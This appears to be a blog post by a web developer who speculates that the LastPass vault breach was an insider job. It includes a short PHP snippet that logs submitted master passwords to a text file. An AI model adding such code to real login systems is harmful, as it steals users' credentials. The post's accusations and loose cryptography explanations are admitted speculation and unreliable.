I’d like to discuss the situation with LastPass. LastPass is a popular password manager application that is used by millions of people to protect and manage their passwords, along with other sensitive items like addresses and credit card details. Recently, it was revealed that the user ‘vaults’ - which is the file location (or database) where customers’ sensitive information is stored has been compromised. In short, if you’re a user of LastPass then there’s a good chance that your sensitive information is now in the hands of hackers. At this point in time the details are incredibly sketchy. However, what we do know is the following:
  • The owners of LastPass appear to have been aware of the attack for several weeks - and perhaps even as long as three months - before releasing any statement to their customer base.
  • The owners of LastPass initially played down the severity of the security breach then gradually, and perhaps due to pressure from social media, have started to release more information about the attack. The news is not good.
  • The owners of LastPass have been widely criticized, by security experts, for their handling of the situation (for example: here)

What Went Wrong?

Unfortunately, the owners of LastPass have gone to great lengths to avoid disclosing either how their password handling system works or the nature of the attack that took place. Therefore, I have to warn you that we are about to enter the speculation zone. Everything that I’m about to say should be considered as being wild speculation and should be taken with a huge grain of salt. Nevertheless, if LastPass was built by competent and responsible web developers then the master password is the main component used to encrypt and decrypt data in the LastPass password manager. It is used to generate other components such as the initialization vector (IV), nonce, and secret key, which are all used in the encryption process. These components, along with the master password, help ensure the security of the encryption process. In cryptography, an initialization vector (IV) is a fixed-size input that is used along with a secret key to encrypt data. It is typically used in block ciphers, which encrypt data in fixed-size blocks. The IV is used to ensure that the same plaintext block always results in a different ciphertext block, even if the secret key remains the same. An encryption key, on the other hand, is a secret piece of information that is used to secure data by transforming it into a form that is unreadable without the key. Encryption keys are used to encrypt and decrypt data, and they can be used in various encryption algorithms and protocols. In some cases, the IV and the encryption key are used together to encrypt and decrypt data. For example, in the AES (Advanced Encryption Standard) algorithm, both an IV and a secret key are used to encrypt and decrypt data. The IV is used to ensure that the same plaintext block always results in a different ciphertext block, while the secret key is used to perform the actual encryption and decryption. It's important to note that the IV and the encryption key serve different purposes, and they should not be confused with each other. The IV is used to help ensure the security of the encryption process, while the encryption key is used to actually secure the data.

Two Huge Weaknesses

One of the biggest weaknesses with the LastPass security protocol is that it relies on the user's master password to secure their data. If the user's master password is weak or easy to guess, it could potentially be compromised, leading to the potential exposure of the user's sensitive information. Another potential weakness is that, like any password manager, LastPass stores the user's sensitive information on its servers. If the LastPass servers were to be hacked, the user's sensitive information could potentially be accessed by an unauthorized party. Before moving on, it’s worth taking a moment to define what ‘hacking’ means. Hacking refers to the act of accessing or attempting to access computer systems, networks, or devices without the authorization of the owner or operator. It can be done for a variety of purposes, such as to steal sensitive information, to disrupt or disable computer systems or networks, or to gain unauthorized access to restricted resources. Hacking can be done using a variety of methods, such as exploiting vulnerabilities in computer systems or networks, using malware or other malicious software, or by using social engineering techniques to trick users into revealing their passwords or other sensitive information. There are many different types of hacking, and the methods used by hackers can vary significantly. Some hackers may be motivated by financial gain, while others may be motivated by a desire to cause disruption or to gain access to restricted information. It’s important to note that ‘hacking’ does not necessarily involve writing code.

How To Hack An App Like LastPass (broadly speaking)

There are a variety of ways that the LastPass servers could potentially be hacked. Some possible scenarios include: Cyber attacks: Hackers could potentially launch a cyber attack on the LastPass servers in an attempt to gain access to the user data stored on them. This could be done using various tactics such as malware, phishing attacks, or other forms of cyber espionage. Physical attacks: Hackers could potentially physically access the LastPass servers and attempt to compromise them. This could be done by physically accessing the servers themselves or by intercepting data transmissions between the servers and other devices. Insider threats: It is also possible that an insider (such as an employee or contractor) could gain unauthorized access to the LastPass servers and potentially compromise the user data stored on them. I’m a web developer. I’m also an extremely ethical developer. However, if an evil version of me - in some parallel universe - was determined to hack an app like LastPass, my strategy would be to forget about web development and focus entirely on what I see as being the weakest link. The employees. In that bizarre and impossible scenario, the evil version of me would be using every means at his disposal to find and bribe a LastPass employee who had FTP access.

What Probably Happened

Whilst there will surely be question marks about the competence of the LastPass development team, as programmers, I would speculate that the most likely scenario is that it was an ‘insider job’. In other words, a present or previous employee of LastPass has probably assisted hackers in their attempts to access sensitive customer data. Why do I say this? When it comes to password handling - be it on an app like LastPass or even on an ordinary website - there is a huge white elephant in the room that most programmers and developers never like talking about. This problem can be described in terms of a seemingly simple question: “Is it possible to build a password management system so powerful that it would be impossible for even the developer who made the system to gain access to the passwords?” I have personally wrestled with this question for a solid two weeks. It’s a technical question. It’s a question that every responsible developer should be thinking about, particularly in light of what has happened. In my opinion, and after careful consideration, I think that the answer is ‘no’. Regardless of what encryption algorithm or protocol was used, for LastPass, the moment you introduce an employee with a little bit of web development knowledge and bad intentions, the underlying security for that system falls apart like a house of cards.

Here’s The Hack! (probably)

Something as simple as, adding some code that intercepts submitted master passwords and saves those passwords to a texfile is, all that could be required to break a system like LastPass. A quick search on ‘builtwith.com’ indicates that LastPass uses PHP. So, if you were a LastPass employee with malicious intentions, here’s the code that you’d have to add to the website to achieve your diabolical aims: // Get the posted master password $master_password = $_POST['master_password']; // Open the text file for writing $file = fopen("master_passwords.txt", "a"); // Write the master password to the file fwrite($file, $master_password . "\n"); // Close the file fclose($file); How Can I Be So Sure? To be clear - I'm not sure if I'm right and I can never be sure. As a reminder, this is just wild speculation. However, this speculation is based on the assumption that the programmers who built LastPass were well-intentioned and competent. There does not appear to be any evidence to the contrary. We’re also applying the principle of Occam’s Razor. Occam's Razor is a way to help us figure out which explanation is most likely to be true when we're trying to understand something. It's like a tool we can use to help us make a good guess about what's going on by choosing the explanation that's simplest and has the fewest steps. The ‘bad employee’ theory that I’m giving does not require our accomplice to have a particularly advanced skillset. Furthermore, if applied, it immediately obliterates each and every advanced cryptography algorithm that may or may not have been added to the LastPass security protocol. Even if LastPass was built by the most competent encryption experts on Earth, all it takes is one single employee to carry out the steps that I’ve described and the whole system immediately falls apart - like a house of cards. In order to cover their tracks, the employee would have almost certainly saved the data onto a USB pen. Every day they would have left the building with a USB pen, full of master passwords. I would further speculate that this ‘attack’ would have almost certainly gone on for a period of months. Any criminal investigator would be well advised to look into employees who have FTP access and who have been with the company for more than three months.

What Can We Learn From This?

For the builders of an app like LastPass, I have some technical ideas for improving security. However, I’m not going to discuss those ideas in public (please do get in touch with me if you’re reading!). The good news for the makers of LastPass is, I don’t think that their code is necessarily bad. They may well be the greatest programming team ever - and they’ve just been unlucky because of one bad employee. The bad news is, they appeared to have handled this situation poorly. What they are now facing is something of a PR disaster and I’m not qualified to discuss how to solve that. For the consumer, there are two takeaways: 1). It’s time to come to terms with the thought that your data is not safe - even if you’re using a password manager. When choosing a password manager, the most important question of all might not be anything to do with encryption or programming. The most important question of all might simply be: “Is my password management being handled by an upstanding, ethical and responsible company?” 2). If you’re serious about keeping your private information private then it’s time to get serious about using two factor authentication. Without two-factor authentication in place, we must assume that our data is unsafe, and that includes site passwords. For anyone out there who is facing an absolute worst case scenario (i.e., all of your data as been stolen and massive damage could potentially be inflicted upon; your relationships, your finances and/or your reputation), I will leave you with two simple words of friendly advice.
  • We do not negotiate with terrorists
  • Stop taking life so seriously!
I hope you found this interesting. Thanks for reading! David Connelly UPDATE: Just to elaborate a little more, I think the hosting company (whomever it may be) is also a weak link. So, anyone who is/was in any way involved with the hosting of intellectual assets belonging to LastPass should be on the suspects' list. Since having written this article I've had a chance to learn a little more about how the LastPass owners claim their security protocol works. I cannot see anything that mitigates the 'bad employee' theory or (what I'm now calling) 'the evil webhost' theory. However, if I was to build a password manager app like LastPass then I would personally make sure that the authentication process was handled across at least three different hosting environments, where employees from each environment (company) had no means of being able to personally identify or contact each other. Having previously worked in banking, I know that this mechanism is used for processing paper cheques. I'm surprised that nobody appears to be applying this idea to the business of password management, thus far.